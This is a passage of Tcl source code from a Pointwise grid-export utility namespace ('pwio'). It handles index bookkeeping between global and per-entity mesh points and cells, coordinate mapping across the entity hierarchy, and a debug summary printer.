variable ndxCellTotals
variable offsetGlobToLocalGetCell
utils::assert "$enumNdx >=1 && $enumNdx <= $totalCellCount" \
"Invalid global index in pwio::getCell($enumNdx)"
set ret [list] ;# cell indices
if { "" != $cellSingleEnt } {
set vc [$cellSingleEnt getVolumeCondition]
return [getEntityCell $cellSingleEnt $enumNdx]
}
incr enumNdx -1 ;# convert to 0-based index
# indexes will typically be looped over from 0 to NumCells, so we cache
# the prior index into the cellTotals list (ndxCellTotals) and the prior
# index offset (offsetGlobToLocalGetCell)
if { $enumNdx == [lindex $cellTotals $ndxCellTotals 1] } {
# move to the next position in the cellTotals array
set offsetGlobToLocalGetCell [lindex $cellTotals $ndxCellTotals 1]
incr ndxCellTotals
#puts "ndx=$enumNdx next block \$offsetGlobToLocalGetCell=$offsetGlobToLocalGetCell \$ndxCellTotals=$ndxCellTotals"
} elseif { $enumNdx < $offsetGlobToLocalGetCell || $enumNdx >= [lindex $cellTotals $ndxCellTotals 1] } {
# not in the cached range, so do a binary search to find the correct range
set lo 0
set hi [llength $cellTotals]
while { $lo < $hi } {
set mid [expr {($lo + $hi) / 2}]
if { [lindex $cellTotals $mid 1] <= $enumNdx } {
set lo [incr mid];
} else {
set hi $mid
}
}
set ndxCellTotals $lo
if { $ndxCellTotals == 0 } {
set offsetGlobToLocalGetCell 0
} else {
set offsetGlobToLocalGetCell [lindex $cellTotals [incr lo -1] 1]
}
#puts "ndx=$enumNdx find block \$offsetGlobToLocalGetCell=$offsetGlobToLocalGetCell \$ndxCellTotals=$ndxCellTotals"
} else {
#puts "ndx=$enumNdx using block \$offsetGlobToLocalGetCell=$offsetGlobToLocalGetCell \$ndxCellTotals=$ndxCellTotals"
}
set vc [[set ent [lindex $cellTotals $ndxCellTotals 2]] getVolumeCondition]
# +1 converts enumNdx back to 1-based index
# return [getEntityCell ent entNdx]
return [getEntityCell $ent [expr {$enumNdx + 1 - $offsetGlobToLocalGetCell}]]
}
#========================================================================
namespace export getCellIndex
proc getCellIndex { ent entNdx } { ;# 1-based index into ent's cell space
variable cellSingleEnt
variable entToCellTotalsOffset
variable cellTotals
variable prevCellEntName
variable offsetGlobToLocalGetCellIndex
if { "" != $cellSingleEnt } {
if { $cellSingleEnt == $ent } {
return $entNdx
} else {
utils::assert false "pwio::getCellIndex: Invalid entity ($ent)"
}
}
if { $ent != $prevCellEntName } {
set match [array get entToCellTotalsOffset $ent]
if { 2 != [llength $match] } {
utils::assert false "pwio::getCellIndex: Entity not found ($ent) '$match'"
}
# match is {ent offset} list
lassign $match -> totalsOffset
set prevCellEntName $ent
set offsetGlobToLocalGetCellIndex [lindex $cellTotals [expr {$totalsOffset - 1}] 1]
}
if { $offsetGlobToLocalGetCellIndex > 0 } {
# cell indices after the first range must be offset to the enum's
# index space
incr entNdx $offsetGlobToLocalGetCellIndex
}
return $entNdx
}
#========================================================================
namespace export getCellEdges
proc getCellEdges { enumNdx {cellVarName ""} {minFirstOrder 0} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
return [cell::getEdges [set cell [pwio::getCell $enumNdx]] $minFirstOrder rev]
}
#========================================================================
namespace export getMinFirstCellEdges
proc getMinFirstCellEdges { enumNdx {cellVarName ""} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
return [cell::getEdges [set cell [pwio::getCell $enumNdx]] 1 rev]
}
#========================================================================
namespace export getFaceEdges
proc getFaceEdges { face {cellVarName ""} {minFirstOrder 0} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
set cell $face
return [cell::getFaceEdges $face $minFirstOrder rev]
}
#========================================================================
namespace export getMinFirstFaceEdges
proc getMinFirstFaceEdges { face {cellVarName ""} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
set cell $face
return [cell::getFaceEdges $face 1 rev]
}
#========================================================================
namespace export getCellFaces
proc getCellFaces { enumNdx {cellVarName ""} {minFirstOrder 0} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
return [cell::getFaces [set cell [pwio::getCell $enumNdx]] $minFirstOrder]
}
#========================================================================
namespace export getMinFirstCellFaces
proc getMinFirstCellFaces { enumNdx {cellVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
return [cell::getFaces [set cell [pwio::getCell $enumNdx]] 1]
}
#========================================================================
namespace export getCellType
proc getCellType {enumNdx} {
    # Name the element type of global cell enumNdx, keyed by CAE
    # dimension and vertex count (2-D: tri/quad; 3-D:
    # tet/pyramid/prism/hex). Key format mirrors cell::edgeMap:
    # "<dim>e<numCellPts>" (the \e renders as a literal "e" and keeps
    # the variable substitution from swallowing it).
    array set cellMap {
        "2e3" "tri"
        "2e4" "quad"
        "3e4" "tet"
        "3e5" "pyramid"
        "3e6" "prism"
        "3e8" "hex"
    }
    set cell [pwio::getCell $enumNdx]
    set key "$pwio::caeDim\e[llength $cell]"
    return $cellMap($key)
}
#========================================================================
namespace export getFaceType
proc getFaceType {face} {
    # Classify a face (a list of vertex indices) by its length:
    # 3 -> "tri", 4 -> "quad". Any other length falls through and
    # yields an empty string, matching the historical behavior.
    switch -exact [llength $face] {
        3 { return "tri" }
        4 { return "quad" }
    }
}
#========================================================================
namespace export getEntityCell
proc getEntityCell { ent ndx {localCellVarName ""} } {
if { "" != $localCellVarName } {
upvar 1 $localCellVarName localCell
}
#puts "--- $ndx"
set ret [list]
foreach locNdx [set localCell [$ent getCell $ndx]] {
lappend ret [pwio::getCoordIndex [utils::makeCoordFromEntIndex $ent $locNdx]]
}
return $ret
}
#========================================================================
namespace export getEntityCellEdges
proc getEntityCellEdges { ent ndx {cellVarName ""} {minFirstOrder 0} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
return [cell::getEdges [set cell [getEntityCell $ent $ndx]] $minFirstOrder rev]
}
#========================================================================
namespace export getMinFirstEntityCellEdges
proc getMinFirstEntityCellEdges { ent ndx {cellVarName ""} {revVarName ""} } {
if { "" != $cellVarName } {
upvar 1 $cellVarName cell
}
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
return [cell::getEdges [set cell [getEntityCell $ent $ndx]] 1 rev]
}
#========================================================================
namespace export dim
proc getCaeDim {} {
variable caeDim
return $caeDim
}
#========================================================================
namespace export getSelectType
proc getSelectType {} {
variable caeDim
array set selInfo { \
2 Domain \
3 Block \
}
return $selInfo($caeDim)
}
#========================================================================
namespace export reset
proc reset {} {
# misc variables
variable selEnts
variable caeDim
variable perimPtCountCache
set selEnts [list]
set caeDim [pw::Application getCAESolverDimension]
array set perimPtCountCache {}
# coords db variables
variable coordSingleEnt
variable entToCoordTotalsOffset
variable coordTotals
variable totalOwnedPts
variable ndxCoordTotals
variable offsetGlobToLocalGetCoord
variable prevCoordEntName
variable offsetGlobToLocalGetCoordIndex
set coordSingleEnt ""
array set entToCoordTotalsOffset {}
set coordTotals [list]
set totalOwnedPts 0
set ndxCoordTotals 0
set offsetGlobToLocalGetCoord 0
set prevCoordEntName "null"
variable offsetGlobToLocalGetCoordIndex 0
# cells db variables
variable cellSingleEnt
variable totalCellCount
variable cellTotals
variable entToCellTotalsOffset
variable ndxCellTotals
variable offsetGlobToLocalGetCell
variable prevCellEntName
variable offsetGlobToLocalGetCellIndex
set cellSingleEnt ""
set totalCellCount 0
set cellTotals [list]
array set entToCellTotalsOffset {}
set ndxCellTotals 0
set offsetGlobToLocalGetCell 0
set prevCellEntName "@null"
set offsetGlobToLocalGetCellIndex 0
}
#========================================================================
namespace export fixCoord
proc fixCoord { coordVarName } {
upvar 1 $coordVarName coord
# force coord to {i j k ent} format
switch -exact [llength $coord] {
2 { set coord [linsert $coord 1 1 1] }
3 { set coord [linsert $coord 2 1] }
4 { set dummy 1 }
default { utils::assert false "pwio::fixCoord: Bad coord value ($coord)" }
}
return $coord
}
#========================================================================
namespace export coordMapLower
proc coordMapLower { coord } {
set ent [coordGetEntity $coord]
pwio::fixCoord coord
switch -exact [$ent getType] {
pw::Node {
return [list]
}
pw::Connector {
set i [lindex $coord 0]
if { $i == 1 } {
return [list [list 1 1 1 [$ent getNode Begin]]]
} elseif { $i == [$ent getPointCount] } {
return [list [list 1 1 1 [$ent getNode End]]]
}
return [list]
}
}
return [pw::Grid mapLower $coord]
}
#========================================================================
  namespace export mapToOwner
  # Repeatedly maps coord to lower entity levels until it reaches the
  # entity that owns the grid point, and returns that owning coord.
  # Contains a workaround for a Pointwise defect where mapLower can
  # return a coord on the wrong entity; candidates are validated by
  # comparing XYZ positions within the connector tolerance.
  proc mapToOwner { coord {trace 0} } {
    set conTol [pw::Grid getConnectorTolerance]
    # remember the physical location so lower-level candidates can be
    # validated against it
    set origXyz [pw::Grid getXYZ $coord]
    set lowerCoords [coordMapLower $coord]
    while { [llength $lowerCoords] > 0 } {
      if { $trace } {
        puts "\{$coord\} [entGetName [pw::Grid getEntity $coord]] ([pw::Grid getXYZ $coord])"
        foreach crd $lowerCoords {
          puts "---> $crd [entGetName [pw::Grid getEntity $crd]] ([pw::Grid getXYZ $crd])"
        }
      }
      # If more than one, just grab first. Eventually, only one, owning
      # ent will be returned and next call to coordMapLower will return an
      # empty list ending the loop
      #set coord [lindex $lowerCoords 0]
      #set lowerCoords [coordMapLower $coord]
      # BUG WORKAROUND - sometimes an invalid lower con is returned!
      # Search returned lower entities making sure lower ent has same xyz
      set hadMismatch 0
      foreach coord $lowerCoords {
        if { [utils::xyzEqual $origXyz [pw::Grid getXYZ $coord] $conTol] } {
          if { $hadMismatch } {
            #puts "Using coord \{$coord\} after mismatch"
            set hadMismatch 0
          }
          # $coord now holds a positionally-verified candidate
          break
        }
        set hadMismatch 1
        #puts "mismatch! \{$coord\} [entGetName [pw::Grid getEntity $coord]] ([pw::Grid getXYZ $coord]) != $origXyz"
      }
      utils::assert !$hadMismatch "Could not find matching coord! \{$coord\}"
      set lowerCoords [coordMapLower $coord]
    }
    # loop exits when coord has no lower equivalent - it is the owner
    return $coord
  }
#========================================================================
  namespace export coordGetEntity
  # Returns the entity of a coord; the entity is always the final
  # element of the coord list (both the short and canonical forms).
  proc coordGetEntity { coord } {
    return [lindex $coord end]
  }
#========================================================================
namespace export coordGetIjk
proc coordGetIjk { coord } {
return [lrange [pwio::fixCoord coord] 0 2]
}
#========================================================================
  # Entity hierarchy levels, ordered from highest (Block) to lowest
  # (Node). Used by entGetLevel/coordGetLevel and the coord mapping
  # routines.
  namespace eval Level {
    variable Block 3
    variable Domain 2
    variable Connector 1
    variable Node 0
  }
#========================================================================
namespace export entGetLevel
proc entGetLevel { entOrBaseType } {
# usage:
# entGetLevel Block ;# returns 3
# entGetLevel ::pw::Connector_3 ;# returns 1
array set rank {Block 3 Domain 2 Connector 1 Node 0}
if { "" == [array get rank $entOrBaseType] } {
# ent is NOT a base ent type. Assume it is an entity
set entOrBaseType [utils::entBaseType $entOrBaseType]
}
return $rank($entOrBaseType)
}
#========================================================================
namespace export coordGetLevel
proc coordGetLevel { coord } {
return [entGetLevel [coordGetEntity $coord]]
}
#========================================================================
namespace export coordMapToEntity
proc coordMapToEntity { fromCoord toEnt coordsVarName } {
upvar 1 $coordsVarName coords
set coords {}
coordMapToLevel $fromCoord [entGetLevel $toEnt] locCoords
foreach coord $locCoords {
if { [coordGetEntity $coord] == $toEnt } {
lappend coords [pwio::fixCoord coord]
}
}
return [llength $coords]
}
#========================================================================
  namespace export coordMapToLevel
  # Maps coord to all unique, equivalent coords at hierarchy level
  # toLevel, walking the entity hierarchy down (mapLower) or up
  # (mapHigher) one level at a time. Results are stored in the caller's
  # coordsVarName list; returns the number of coords found.
  proc coordMapToLevel { coord toLevel coordsVarName } {
    upvar 1 $coordsVarName coords
    set coords [list]
    array set uniqueCoords {} ;# tracks unique coords
    set coordLevel [coordGetLevel $coord]
    if { $toLevel == $coordLevel } {
      # Simple case of the coordinate already at the correct toLevel
      lappend coords [pwio::fixCoord coord]
    } else {
      set currCoords [list $coord] ;# prime the pump
      set nextCoords [list]
      if { $coordLevel > $toLevel } {
        # map coord to a lower level coord
        while { [llength $currCoords] > 0 } {
          # For each higher toLevel coordinate, map down and store in nextCoords
          set nextCoords [list]
          foreach coord $currCoords {
            set nextCoords [concat $nextCoords [coordMapLower $coord]]
          }
          # Clear out currCoords and append the appropriate
          # coordinates from nextCoords to currCoords
          set currCoords [list]
          foreach coord $nextCoords {
            set coordLevel [coordGetLevel $coord]
            if { $coordLevel > $toLevel } {
              # Still too high. Append coord to currCoords so while
              # loop will process on next pass
              lappend currCoords $coord
            } elseif { $coordLevel == $toLevel } {
              # found ent at target toLevel - keep it
              pwio::fixCoord coord
              # set uniqueCoords(1,1,1,pw::entname) $coord
              set uniqueCoords([join $coord ,]) $coord
            }
          }
        }
      } else {
        # map coord to a higher level coord
        while { [llength $currCoords] > 0 } {
          set nextCoords [list]
          foreach coord $currCoords {
            set nextCoords [concat $nextCoords [pw::Grid mapHigher $coord]]
          }
          # Clear out currCoords and append the appropriate
          # coordinates from nextCoords to currCoords
          set currCoords [list]
          foreach coord $nextCoords {
            set coordLevel [coordGetLevel $coord]
            if { $coordLevel < $toLevel } {
              # Still too low. Append coord to currCoords so while
              # loop will process on next pass
              lappend currCoords $coord
            } elseif { $coordLevel == $toLevel } {
              # found ent at target toLevel - keep it
              pwio::fixCoord coord
              # set uniqueCoords(1,1,1,pw::entname) $coord
              set uniqueCoords([join $coord ,]) $coord
            }
          }
        }
      }
      # load unique coordinates into coords
      foreach {key coord} [array get uniqueCoords] {
        lappend coords $coord
      }
    }
    return [llength $coords]
  }
#--------------- PRIVATE -------------------
#========================================================================
proc build { } {
return [expr {[buildCoords] && [buildCells]}]
}
#========================================================================
  # Rebuilds the coord lookup tables from the selected entities and all
  # of their lower-level support entities. Returns 1 on success.
  proc buildCoords { } {
    variable selEnts
    variable coordSingleEnt
    variable entToCoordTotalsOffset
    variable coordTotals
    variable totalOwnedPts
    variable ndxCoordTotals
    variable offsetGlobToLocalGetCoord
    variable prevCoordEntName
    variable offsetGlobToLocalGetCoordIndex
    # load $selEnts and all their lower level entities into allEnts
    set ret [utils::getSupportEnts $selEnts allEnts true]
    if { $ret } {
      if { 1 == [llength $selEnts] } {
        set coordSingleEnt [lindex $selEnts 0]
        # check if the entity pt count is equal to the total number of owned
        # points. if so, then we can use the single entity optimization
        set totalOwnedPts 0
        foreach ent $allEnts {
          incr totalOwnedPts [utils::getOwnedPointCount $ent]
        }
        if { $totalOwnedPts != [$coordSingleEnt getPointCount] } {
          # points are shared with other entities - fall back to the
          # multi-entity bookkeeping below
          set coordSingleEnt ""
        }
      }
      if { "" == $coordSingleEnt } {
        set allEnts [utils::sortEntsByType $allEnts]
        # Go through the entities and:
        #   Add them to the entToCoordTotalsOffset array
        #   Add the runningTotal+ent pair to the coordTotals list
        set totalOwnedPts 0
        foreach ent $allEnts {
          set ownedPts [utils::getOwnedPointCount $ent]
          if { $ownedPts > 0 } {
            incr totalOwnedPts $ownedPts
            set offset [llength $coordTotals]
            set entToCoordTotalsOffset($ent) $offset
            lappend coordTotals [list $ownedPts $totalOwnedPts $ent]
          }
        }
      }
      # initialize the cache to the beginning of the coordTotals array
      # used by getCoord
      set ndxCoordTotals 0
      set offsetGlobToLocalGetCoord 0
      # initialize the entities cache to the beginning of the entToCoordTotalsOffset array
      # used by getIndex
      set prevCoordEntName "@null" ;# lastEnt_
      set offsetGlobToLocalGetCoordIndex 0
    } else {
      utils::assert false "getSupportEnts FAILED"
    }
    return $ret
  }
#========================================================================
proc buildCells { } {
variable selEnts
variable cellSingleEnt
variable totalCellCount
variable cellTotals
variable entToCellTotalsOffset
variable ndxCellTotals
variable offsetGlobToLocalGetCell
variable prevCellEntName
variable offsetGlobToLocalGetCellIndex
set ret 1
if { 1 == [llength $selEnts] } {
set cellSingleEnt [lindex $selEnts 0]
set totalCellCount [$cellSingleEnt getCellCount]
} else {
# Go through the selected entities and:
# Add them to the entToCellTotalsOffset array
# Add the runningTotal+ent pair to the cellTotals list
set totalCellCount 0
foreach ent $selEnts {
set cellCount [$ent getCellCount]
if { $cellCount > 0 } {
incr totalCellCount $cellCount
set offset [llength $cellTotals]
set entToCellTotalsOffset($ent) $offset
lappend cellTotals [list $cellCount $totalCellCount $ent]
}
}
# initialize the cache to the beginning of the cellTotals array
# used by pwio::getCell
set ndxCellTotals 0
set offsetGlobToLocalGetCell 0
# initialize the cells cache to the beginning of the cells array
# used by pwio::getCellIndex
set prevCellEntName "@null"
set offsetGlobToLocalGetCellIndex 0
}
return $ret
}
#========================================================================
proc getCoordEnumEntCount {} {
variable coordTotals
variable coordSingleEnt
if { "" != $coordSingleEnt } {
set ret 1
} else {
set ret [llength $coordTotals]
}
return $ret
}
#========================================================================
proc getCoordEnumEnt { ndx } { ;# 0 to getCoordEnumEntCount-1
variable coordTotals
variable coordSingleEnt
if { "" != $coordSingleEnt } {
utils::assert "$ndx == 0 " "getCoordEnumEnt: Invalid single ent index ($ndx)"
set ret $coordSingleEnt
} else {
utils::assert "$ndx >= 0 && $ndx < [getCoordEnumEntCount]" \
"getCoordEnumEnt: Invalid multi ent index ($ndx)"
set ret [lindex $coordTotals $ndx 2]
}
return $ret
}
#========================================================================
proc getCoordEnumOffset { ndx } { ;# 0 to getCoordEnumEntCount-1
utils::assert "$ndx >= 0 && $ndx < [getCoordEnumEntCount]" \
"getCoordEnumOffset: Invalid index ($ndx)"
variable coordTotals
variable coordSingleEnt
if { 0 == $ndx } {
set ret 0
} elseif { "" != $coordSingleEnt } {
# 0 is the only valid index for single ent
utils::assert false "getCoordEnumOffset: Invalid single ent index ($ndx)"
} else {
# if here, ndx >= 1 and multi ent pwio
# offset is running owned total of previous item in coordTotals
set ret [lindex $coordTotals [incr ndx -1] 1]
}
return $ret
}
#========================================================================
proc getCoordEnumRange { ndx } { ;# 0 to getCoordEnumEntCount-1
variable coordTotals
variable coordSingleEnt
if { 0 == $ndx } {
set offset 0
} elseif { "" != $coordSingleEnt } {
# 0 is the only valid index for single ent
utils::assert false "getCoordEnumRange: Invalid single ent index ($ndx)"
} else {
utils::assert "$ndx > 0 && $ndx < [getCoordEnumEntCount]" \
"getCoordEnumRange: Invalid multi ent index ($ndx)"
set offset [getCoordEnumOffset $ndx]
}
# if here, ndx is valid
# set to local entity owned indices
set startNdx 1
set endNdx [getCoordEnumNumOwnedPts $ndx]
# incr by offset to make global enum indices
return [list [incr startNdx $offset] [incr endNdx $offset]]
}
#========================================================================
proc getCoordEnumNumOwnedPts { ndx } { ;# 0 to getCoordEnumEntCount-1
utils::assert "$ndx >= 0 && $ndx < [getCoordEnumEntCount]" \
"getCoordEnumNumOwnedPts: Invalid index ($ndx)"
variable coordTotals
variable coordSingleEnt
if { "" != $coordSingleEnt } {
set ret [$coordSingleEnt getPointCount]
} else {
set ret [lindex $coordTotals $ndx 0]
}
return $ret
}
#========================================================================
proc getCellEnumEntCount {} {
variable cellTotals
variable cellSingleEnt
if { "" != $cellSingleEnt } {
set ret 1
} else {
set ret [llength $cellTotals]
}
return $ret
}
#========================================================================
proc getCellEnumEnt { ndx } { ;# 0 to getCellEnumEntCount-1
variable cellTotals
variable cellSingleEnt
if { "" != $cellSingleEnt } {
utils::assert "$ndx == 0 " "getCellEnumEnt: Invalid single ent index ($ndx)"
set ret $cellSingleEnt
} else {
utils::assert "$ndx >= 0 && $ndx < [getCellEnumEntCount]" \
"getCellEnumEnt: Invalid multi ent index ($ndx)"
set ret [lindex $cellTotals $ndx 2]
}
return $ret
}
#========================================================================
proc getCellEnumOffset { ndx } { ;# 0 to getCellEnumEntCount-1
utils::assert "$ndx >= 0 && $ndx < [getCellEnumEntCount]" \
"getCellEnumOffset: Invalid index ($ndx)"
variable cellTotals
variable cellSingleEnt
if { 0 == $ndx } {
set ret 0
} elseif { "" != $cellSingleEnt } {
# 0 is the only valid index for single ent
utils::assert false "getCellEnumOffset: Invalid single ent index ($ndx)"
} else {
# if here, ndx >= 1 and multi ent pwio
# offset is running owned total of previous item in cellTotals
set ret [lindex $cellTotals [incr ndx -1] 1]
}
return $ret
}
#========================================================================
proc getCellEnumRange { ndx } { ;# 0 to getCellEnumEntCount-1
variable cellTotals
variable cellSingleEnt
if { 0 == $ndx } {
set offset 0
} elseif { "" != $cellSingleEnt } {
# 0 is the only valid index for single ent
utils::assert false "getCellEnumRange: Invalid single ent index ($ndx)"
} else {
utils::assert "$ndx > 0 && $ndx < [getCellEnumEntCount]" \
"getCellEnumRange: Invalid multi ent index ($ndx)"
set offset [getCellEnumOffset $ndx]
}
# if here, ndx is valid
# set to local entity owned indices
set startNdx 1
set endNdx [getCellEnumNumOwnedPts $ndx]
# incr by offset to make global enum indices
return [list [incr startNdx $offset] [incr endNdx $offset]]
}
#========================================================================
proc getCellEnumNumOwnedPts { ndx } { ;# 0 to getCellEnumEntCount-1
utils::assert "$ndx >= 0 && $ndx < [getCellEnumEntCount]" \
"getCellEnumNumOwnedPts: Invalid index ($ndx)"
variable cellTotals
variable cellSingleEnt
if { "" != $cellSingleEnt } {
set ret [$cellSingleEnt getPointCount]
} else {
set ret [lindex $cellTotals $ndx 0]
}
return $ret
}
#========================================================================
  # Number of grid points owned by a specific entity in the coord
  # enumeration. Asserts if ent is not part of the enumeration.
  proc entGetCoordEnumNumOwnedPts { ent } {
    variable coordSingleEnt
    variable entToCoordTotalsOffset
    if { $ent == $coordSingleEnt } {
      set ret [$coordSingleEnt getPointCount]
    } elseif { "" != $coordSingleEnt } {
      # single-entity mode, but ent is a different entity
      utils::assert false "entGetCoordEnumNumOwnedPts: Single entity mismatch ($coordSingleEnt != $ent)"
    } elseif { "" == [array get entToCoordTotalsOffset $ent] } {
      # multi-entity mode, but ent owns no points / was never registered
      utils::assert false "entGetCoordEnumNumOwnedPts: Invalid entity ($ent)"
    } else {
      set ret [getCoordEnumNumOwnedPts $entToCoordTotalsOffset($ent)]
    }
    return $ret
  }
#========================================================================
proc entGetCachedNumPerimeterPts { ent } {
variable perimPtCountCache
if { "" == [array get perimPtCountCache $ent] } {
set perimPtCountCache($ent) [utils::getPerimeterPointCount $ent]
}
return $perimPtCountCache($ent)
}
#========================================================================
proc entIjkToOwnedIndex { ent ijk } { ;# ijk must be 1-based
variable coordSingleEnt
if { "" != $coordSingleEnt } {
utils::assert "[string equal $coordSingleEnt $ent]" "entOwnedIndexToIjk: Single entity mismatch ($coordSingleEnt != $ent)"
return [utils::entIjkToIndex $ent $ownedNdx]
}
set ret 0
lassign $ijk i j k
switch -exact [$ent getType] {
pw::Node {
utils::assert "1 == $i" "entIjkToOwnedIndex: Invalid Node ijk \{$ijk\} ($ent)"
set ret $i
}
pw::Connector {
utils::assert "[$ent isInteriorIndex $i]" \
"entIjkToOwnedIndex: Invalid Connector ijk \{$ijk\} ($ent)"
set ret [incr i -1]
}
pw::DomainUnstructured {
utils::assert "[$ent isInteriorIndex $i]" \
"entIjkToOwnedIndex: Invalid DomainUnstructured ijk \{$ijk\} ($ent)"
set ret [incr i -[entGetCachedNumPerimeterPts $ent]]
}
pw::DomainStructured {
utils::assert "[$ent isInteriorIndex [list $i $j]]" \
"entIjkToOwnedIndex: Invalid DomainStructured ijk \{$ijk\} ($ent)"
set entDims [$ent getDimensions]
lassign $entDims idim jdim
# convert ent ij dims to owned ij dims
set ownedDims [list [incr idim -2] [incr jdim -2]]
# convert ij to owned ij
incr i -1
incr j -1
set ret [utils::ijkToIndexStructured [list $i $j] $ownedDims]
}
pw::BlockUnstructured {
utils::assert "[$ent isInteriorIndex $i]" \
"entIjkToOwnedIndex: Invalid BlockUnstructured ijk \{$ijk\} ($ent)"
set ret [incr i -[entGetCachedNumPerimeterPts $ent]]
}
pw::BlockStructured {
utils::assert "[$ent isInteriorIndex $ijk]" \
"entIjkToOwnedIndex: Invalid BlockStructured ijk \{$ijk\} ($ent)"
set entDims [$ent getDimensions]
lassign $entDims idim jdim kdim
# convert ent ijk dims to owned ijk dims
set ownedDims [list [incr idim -2] [incr jdim -2] [incr kdim -2]]
# convert ij to owned ij
incr i -1
incr j -1
incr k -1
set ret [utils::ijkToIndexStructured [list $i $j $k] $ownedDims]
}
pw::BlockExtruded {
utils::assert "[$ent isInteriorIndex $ijk]" \
"entIjkToOwnedIndex: Invalid BlockExtruded ijk \{$ijk\} ($ent)"
set numBasePerimPts [entGetCachedNumPerimeterPts [$ent getFace JMinimum]]
set entDims [$ent getDimensions]
lassign $entDims idim jdim kdim
# convert ent ijk dims to owned ijk dims
set ownedDims [list [incr idim -$numBasePerimPts] $jdim [incr kdim -2]]
# convert ijk to owned ijk
incr i -$numBasePerimPts
# j stays 1
incr k -1
set ret [utils::ijkToIndexStructured [list $i $j $k] $ownedDims]
}
default {
utils::assert false "entOwnedIndexToIjk: bad etype '[$ent getType]'"
}
}
return $ret
}
#========================================================================
  # Converts a 1-based OWNED (interior) point index back to the entity's
  # 1-based {i j k}. Inverse of entIjkToOwnedIndex.
  proc entOwnedIndexToIjk { ent ownedNdx } { ;# ownedNdx must be 1-based
    variable coordSingleEnt
    if { "" != $coordSingleEnt } {
      utils::assert "[string equal $coordSingleEnt $ent]" \
        "entOwnedIndexToIjk: Single entity mismatch ($coordSingleEnt != $ent)"
      # NOTE(review): entIndexToIjk is unqualified here while the sibling
      # proc entIjkToOwnedIndex calls utils::entIjkToIndex - confirm a
      # pwio::entIndexToIjk exists or whether utils:: is missing.
      return [entIndexToIjk $ent $ownedNdx]
    }
    utils::assert "$ownedNdx >= 1 && $ownedNdx <= [pwio::entGetCoordEnumNumOwnedPts $ent]" \
      "entOwnedIndexToIjk: Bad Owned Index $ownedNdx for $ent"
    set ret 0
    switch -exact [$ent getType] {
      pw::Node {
        set ret [list $ownedNdx 1 1]
      }
      pw::Connector {
        # owned index 1 is the first interior point (ent index 2)
        set ret [list [incr ownedNdx 1] 1 1]
      }
      pw::DomainUnstructured {
        # interior points follow the perimeter points in the ent index space
        set ret [list [expr {$ownedNdx + [entGetCachedNumPerimeterPts $ent]}] 1 1]
      }
      pw::DomainStructured {
        set entDims [$ent getDimensions]
        lassign $entDims idim jdim
        # the -2 will reduce ent ij dims to owned ij dims
        set ownedDims [list [incr idim -2] [incr jdim -2]]
        # convert ownedNdx to owned{i j} and assign to i j vars
        lassign [utils::indexToIjkStructured $ownedNdx $ownedDims] i j
        # ent{i j} = owned{i j}+{1 1}
        set ret [list [incr i] [incr j] 1]
      }
      pw::BlockUnstructured {
        set ret [list [expr {$ownedNdx + [entGetCachedNumPerimeterPts $ent]}] 1 1]
      }
      pw::BlockStructured {
        set entDims [$ent getDimensions]
        lassign $entDims idim jdim kdim
        # the -2 will reduce ent ijk dims to owned ijk dims
        set ownedDims [list [incr idim -2] [incr jdim -2] [incr kdim -2]]
        # convert ownedNdx to owned{i j k} and assign to i j k vars
        lassign [utils::indexToIjkStructured $ownedNdx $ownedDims] i j k
        # ent{i j k} = owned{i j k}+{1 1 1}
        set ret [list [incr i] [incr j] [incr k]]
      }
      pw::BlockExtruded {
        set numBasePerimPts [entGetCachedNumPerimeterPts [$ent getFace JMinimum]]
        set entDims [$ent getDimensions]
        lassign $entDims idim jdim kdim
        # reduce ent ijk dims to owned ijk dims
        set ownedDims [list [incr idim -$numBasePerimPts] $jdim [incr kdim -2]]
        # convert ownedNdx to owned{i j k}
        lassign [utils::indexToIjkStructured $ownedNdx $ownedDims] i j k
        # ent{i j k} = owned{i j k}+{numBasePerimPts 0 1}
        set ret [list [incr i $numBasePerimPts] $j [incr k]]
      }
      default {
        utils::assert false "entOwnedIndexToIjk: bad etype '[$ent getType]'"
      }
    }
    return $ret
  }
#--------------- DEBUG -------------------
#========================================================================
  # Debug helper: dumps the selected entities and the coord/cell
  # enumeration tables (counts, offsets, ranges) to stdout.
  proc printSummary {} {
    variable selEnts
    variable caeDim
    variable entToCoordTotalsOffset
    variable coordTotals
    variable coordSingleEnt
    variable entToCellTotalsOffset
    variable cellTotals
    variable cellSingleEnt
    puts "pwio Summary:"
    puts "totalPts = [getCoordCount]"
    puts "totalCells = [getCellCount]"
    puts ""
    utils::printEntInfo "Selected Entities:" $selEnts
    puts ""
    puts "Grid Points:"
    if { "" != $coordSingleEnt } {
      # single-entity optimization active - no per-entity table to print
      puts "\$coordSingleEnt=[utils::entGetName $coordSingleEnt] ($coordSingleEnt)"
      #getSupportEnts $coordSingleEnt supEnts
      #printEntInfo "Single Ent: Lower Level Entities" [utils::sortEntsByType $supEnts] $caeDim $selEnts
    } else {
      puts "| ndx | ownPts | runTot |      Range      |  EntDims   | Name (entity)                            |"
      puts "|-----|--------|--------|-----------------|------------|------------------------------------------|"
      foreach tot $coordTotals {
        lassign $tot entTot runTot ent
        set totalsOffset $entToCoordTotalsOffset($ent)
        set range [getCoordEnumRange $totalsOffset]
        set entDims [utils::entGetDimensions $ent]
        set name "[utils::entGetName $ent] ($ent)"
        puts [format "| %3d | %6d | %6d | %15.15s | %10.10s | %-40.40s |" \
          $totalsOffset $entTot $runTot $range $entDims $name]
      }
    }
    puts ""
    puts "Grid Cells:"
    if { "" != $cellSingleEnt } {
      puts "\$cellSingleEnt=[utils::entGetName $cellSingleEnt] ($cellSingleEnt)"
    } else {
      puts "| ndx | Cells  | runTot |      Range      |  EntDims   | Name (entity)                            |"
      puts "|-----|--------|--------|-----------------|------------|------------------------------------------|"
      foreach tot $cellTotals {
        lassign $tot entTot runTot ent
